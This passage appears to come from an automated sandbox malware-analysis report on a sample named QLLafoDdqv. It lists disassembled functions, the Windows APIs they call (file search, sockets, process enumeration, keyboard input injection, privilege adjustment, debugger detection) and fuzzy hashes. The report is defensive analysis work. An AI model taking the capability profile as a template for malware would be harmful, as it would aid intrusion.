              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Rectmouse_event$CursorDesktopForeground
              • String ID:
              • API String ID: 2387181109-0
              • Opcode ID: 765aaeedce4ff849935b1ed7c3d945a0398f145955c4d746b5e8d2adc2ed0767
              • Instruction ID: ada55b00d8781adb8c5756bfe7e74830e864a914e828ce3784f89565fd000adf
              • Opcode Fuzzy Hash: 765aaeedce4ff849935b1ed7c3d945a0398f145955c4d746b5e8d2adc2ed0767
              • Instruction Fuzzy Hash: 1F310072104345AFD720DF54CC48BABBBA9FF85310F000919F98697182DBB8EA09CB96
              Function 00749B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00749B78
              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00749C8B
                • Part of subcall function 00743874: GetInputState.USER32 ref: 007438CB
                • Part of subcall function 00743874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00743966
              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00749BA8
              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00749C75
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
              • String ID: *.*
              • API String ID: 1972594611-438819550
              • Opcode ID: 8dd11add7149dc5ab0d17a56fc657661ed4d19806dc38841bde0c914caba73a3
              • Instruction ID: 182ebe23035464f94f5a1a4284ce08357c866eb50e0760f73a40d2cca932f5be
              • Opcode Fuzzy Hash: 8dd11add7149dc5ab0d17a56fc657661ed4d19806dc38841bde0c914caba73a3
              • Instruction Fuzzy Hash: 6C419071D0020A9FCF55DFB4C989AEEBBB9EF05300F24415AE905A2291EB349E84CF64
              Function 006E997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DefDlgProcW.USER32(?,?,?,?,?), ref: 006E9A4E
              • GetSysColor.USER32(0000000F), ref: 006E9B23
              • SetBkColor.GDI32(?,00000000), ref: 006E9B36
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$LongProcWindow
              • String ID:
              • API String ID: 3131106179-0
              • Opcode ID: 71d67bfb49a92f646ffba73c8a7da5ac1453249e6257f14826549e441ab62c2c
              • Instruction ID: 28c86317299bfd33e0a8eb43354ab93956642fb2f3a4ce3490b17ac741a9cfeb
              • Opcode Fuzzy Hash: 71d67bfb49a92f646ffba73c8a7da5ac1453249e6257f14826549e441ab62c2c
              • Instruction Fuzzy Hash: 08A1397010A7A0FEE72D9A2E9D59DBB365FDF82304F144229F902C6791CA2D9D02C676
              Function 00751806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0075304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
                • Part of subcall function 0075304E: _wcslen.LIBCMT ref: 0075309B
              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0075185D
              • WSAGetLastError.WSOCK32 ref: 00751884
              • bind.WSOCK32(00000000,?,00000010), ref: 007518DB
              • WSAGetLastError.WSOCK32 ref: 007518E6
              • closesocket.WSOCK32(00000000), ref: 00751915
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
              • String ID:
              • API String ID: 1601658205-0
              • Opcode ID: 9a6f4fb0ee30d4bc216c5916cd5c2d1326cffc5da6c57927f665e5180eaf2df7
              • Instruction ID: c407075c5f2950f4b479861e2bb77e6603acefab2388f9c2327bb913dbe9ed29
              • Opcode Fuzzy Hash: 9a6f4fb0ee30d4bc216c5916cd5c2d1326cffc5da6c57927f665e5180eaf2df7
              • Instruction Fuzzy Hash: 5551D471A002009FE720AF24C886F6A77E69B44718F54805DF9469F3C3C7B5AD41CBE5
              Function 006D8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
              • API String ID: 0-1546025612
              • Opcode ID: ba38798e410491dae5b845a6c3c9afdf7cdbd403ea7af68e1c94db77ac390410
              • Instruction ID: efcc6938f8e35a1f35dbea4f23efc3e309a218667f0b2e7dc190ecb63132d0b8
              • Opcode Fuzzy Hash: ba38798e410491dae5b845a6c3c9afdf7cdbd403ea7af68e1c94db77ac390410
              • Instruction Fuzzy Hash: 1CA23C71E0061ACFDF24CF58C8447EDB7B2BB54314F2481AAE855A7385EB789D81CB90
              Function 00738298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
              Download Yara Rule
              APIs
              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007382AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: ($tby$|
              • API String ID: 1659193697-2466584908
              • Opcode ID: 05bb3cf3550f4db3ce7c9236ef3b47d4786403cec89c112738ecf8b4305d2f4b
              • Instruction ID: ba284e5c921038b52b2eb15278b4e4f79bf28b77b3e0acc91572e785a4e4fe4e
              • Opcode Fuzzy Hash: 05bb3cf3550f4db3ce7c9236ef3b47d4786403cec89c112738ecf8b4305d2f4b
              • Instruction Fuzzy Hash: B2323574A00705DFDB68CF59C081A6AB7F1FF48710B15856EE49ADB3A2EB74E941CB40
              Function 0075A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
              Download Yara Rule
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 0075A6AC
              • Process32FirstW.KERNEL32(00000000,?), ref: 0075A6BA
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • Process32NextW.KERNEL32(00000000,?), ref: 0075A79C
              • CloseHandle.KERNEL32(00000000), ref: 0075A7AB
                • Part of subcall function 006ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00713303,?), ref: 006ECE8A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
              • String ID:
              • API String ID: 1991900642-0
              • Opcode ID: 16855abe89def3deff3a485a1ad00df973d8f0baafa1d38b517cee9a0610b007
              • Instruction ID: 7846b0c523e5dbecaee7f45f4c12ba40fca8bb249599fd89b8535eaecb573475
              • Opcode Fuzzy Hash: 16855abe89def3deff3a485a1ad00df973d8f0baafa1d38b517cee9a0610b007
              • Instruction Fuzzy Hash: 28518F71908300AFD750DF24C885A6BBBE9FF89754F00892EF98597351EB74D904CB96
              Function 0073AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
              Download Yara Rule
              APIs
              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0073AAAC
              • SetKeyboardState.USER32(00000080), ref: 0073AAC8
              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0073AB36
              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0073AB88
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 4bd650200eb1c085d6d9ef9c9f27ca8063e517b6d0ee1f2c7e1094429be5ee9a
              • Instruction ID: 129404737919c7410d2705fcaff36fe9de98f035896fdfe152072b2e7bf3ceb6
              • Opcode Fuzzy Hash: 4bd650200eb1c085d6d9ef9c9f27ca8063e517b6d0ee1f2c7e1094429be5ee9a
              • Instruction Fuzzy Hash: E131E7B1A40248BEFF35CB65CC06BFABBAAAB44310F04821AE5C1565D2D37D8981C767
              Function 0074CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
              Download Yara Rule
              APIs
              • InternetReadFile.WININET(?,?,00000400,?), ref: 0074CE89
              • GetLastError.KERNEL32(?,00000000), ref: 0074CEEA
              • SetEvent.KERNEL32(?,?,00000000), ref: 0074CEFE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorEventFileInternetLastRead
              • String ID:
              • API String ID: 234945975-0
              • Opcode ID: 370d55c21c6df1f56bf593ecd3ddd77ff4c135276c20d69096285406fc835a3a
              • Instruction ID: 5e83847490e8a6298e77c76b65a89ae602836447611fa2be20e10eb850a88be2
              • Opcode Fuzzy Hash: 370d55c21c6df1f56bf593ecd3ddd77ff4c135276c20d69096285406fc835a3a
              • Instruction Fuzzy Hash: 8021CFB2501305DFEB62DFA5C948BA77BFCEB00314F10842EE646D2151E778EE088B54
              Function 00702622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0070271A
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00702724
              • UnhandledExceptionFilter.KERNEL32(?), ref: 00702731
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 10c37ab6fa80ee9a3f2465fad78fcb503204293edf5eb32fb2fad4c58867823e
              • Instruction ID: 6de7ad7c03e04120af60d7a20141a5c827c0e0574be8d558ef923d8ef415efe7
              • Opcode Fuzzy Hash: 10c37ab6fa80ee9a3f2465fad78fcb503204293edf5eb32fb2fad4c58867823e
              • Instruction Fuzzy Hash: 9631C47591121C9BCB61DF68DC88798BBB8BF08310F5042EAE90CA6261E7749F818F49
              Function 007451CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 007451DA
              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00745238
              • SetErrorMode.KERNEL32(00000000), ref: 007452A1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$DiskFreeSpace
              • String ID:
              • API String ID: 1682464887-0
              • Opcode ID: 1368a1a95e7841840ae6ee3b64f494694afe8f662db0178cf1cb354328d4a80a
              • Instruction ID: cb428331a942e173e58d8081716f406feec75a5c1e3b666248eb3a6dbb6df7db
              • Opcode Fuzzy Hash: 1368a1a95e7841840ae6ee3b64f494694afe8f662db0178cf1cb354328d4a80a
              • Instruction Fuzzy Hash: F3318F75A00608DFDB00DF94D884EADBBB5FF49314F08809AE805AB362DB75EC46CB91
              Function 007316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0668
                • Part of subcall function 006EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0685
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
              • GetLastError.KERNEL32 ref: 0073174A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
              • String ID:
              • API String ID: 577356006-0
              • Opcode ID: b3972c858636e6ab0fa7aff2e3fdc459fc30a003364eef0cd6d1f50bdbc1210d
              • Instruction ID: 058585ce52833b0e7ae5efef695a214eb2aea3def8902183c3392c42866e24c2
              • Opcode Fuzzy Hash: b3972c858636e6ab0fa7aff2e3fdc459fc30a003364eef0cd6d1f50bdbc1210d
              • Instruction Fuzzy Hash: 0011C1B2404309AFE718AF54DC86D6ABBBDEF04754B24852EE05657242EB75BC418B24
              Function 0073D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073D608
              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0073D645
              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073D650
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle
              • String ID:
              • API String ID: 33631002-0
              • Opcode ID: 92cd15ec0e4607a55dfc0f5c3501bdad32f40509ec84ba31778af0b7981eb8b4
              • Instruction ID: 4b94de717043dfe8f0183ecbf240466d265ef23043a4e2c3a595e0f54d22b1a6
              • Opcode Fuzzy Hash: 92cd15ec0e4607a55dfc0f5c3501bdad32f40509ec84ba31778af0b7981eb8b4
              • Instruction Fuzzy Hash: 4C117C71E01228BFEB208F95EC45FAFBBBCEB45B50F108111F914E7290C2B44A058BA1
              Function 00731663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
              Download Yara Rule
              APIs
              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0073168C
              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007316A1
              • FreeSid.ADVAPI32(?), ref: 007316B1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateCheckFreeInitializeMembershipToken
              • String ID:
              • API String ID: 3429775523-0
              • Opcode ID: fe61f2be3367b20cc2006f2da4fc4e16b2eacfb869aaa6c095d1f1dea4584750
              • Instruction ID: ce25ff58142e55fb1f2cacf6199394dbe537d454f2c16ef468f29fa9f995e1fd
              • Opcode Fuzzy Hash: fe61f2be3367b20cc2006f2da4fc4e16b2eacfb869aaa6c095d1f1dea4584750
              • Instruction Fuzzy Hash: 29F0F471950309FBEB00DFE49D89AAEBBBCEB08604F508565E601E2181E778AA448A54
              Function 006F4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000,?,007028E9), ref: 006F4D09
              • TerminateProcess.KERNEL32(00000000,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000,?,007028E9), ref: 006F4D10
              • ExitProcess.KERNEL32 ref: 006F4D22
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 1718cc2e888df65891bc45fcf5e540061adf48f7a6a3b0a8cc9986c471beacb1
              • Instruction ID: 53034d1fc41a8cb638c4b4dab46f84ac2bb22d4284ca608a6440f235a070d544
              • Opcode Fuzzy Hash: 1718cc2e888df65891bc45fcf5e540061adf48f7a6a3b0a8cc9986c471beacb1
              • Instruction Fuzzy Hash: A8E0B63100024CABDF12AF55DD09AAA3F6AEF86781B108018FD569A722DB79DD42CA84
              Function 0070C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 3b70dd2df338deecaea4cae5e0a9675701409c17ec331c537c5c7a859d3da43e
              • Instruction ID: e4962ac9915e105f42fb9ed5e245cadedddf7245ddaaffb5c048f85a8d2ff4cb
              • Opcode Fuzzy Hash: 3b70dd2df338deecaea4cae5e0a9675701409c17ec331c537c5c7a859d3da43e
              • Instruction Fuzzy Hash: 15411372900219EBCB209FB9DC89EBBB7B8EB84314F1083A9F905D71C0E6749D818B50
              Function 0072D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
              Download Yara Rule
              APIs
              • GetUserNameW.ADVAPI32(?,?), ref: 0072D28C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: NameUser
              • String ID: X64
              • API String ID: 2645101109-893830106
              • Opcode ID: b8cfc341ca2d6c387d59d4fa769c0111609583b75a211ffec9d90fcdf6681f46
              • Instruction ID: 1119d53399aea9467d0e0056da3568c405e23970d8a8cd78d314b90c0294ea57
              • Opcode Fuzzy Hash: b8cfc341ca2d6c387d59d4fa769c0111609583b75a211ffec9d90fcdf6681f46
              • Instruction Fuzzy Hash: 8BD0C9B480122DEACB90CB90EC88DE9B3BCBB04305F104151F106A2000D77495498F20
              Function 006FCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
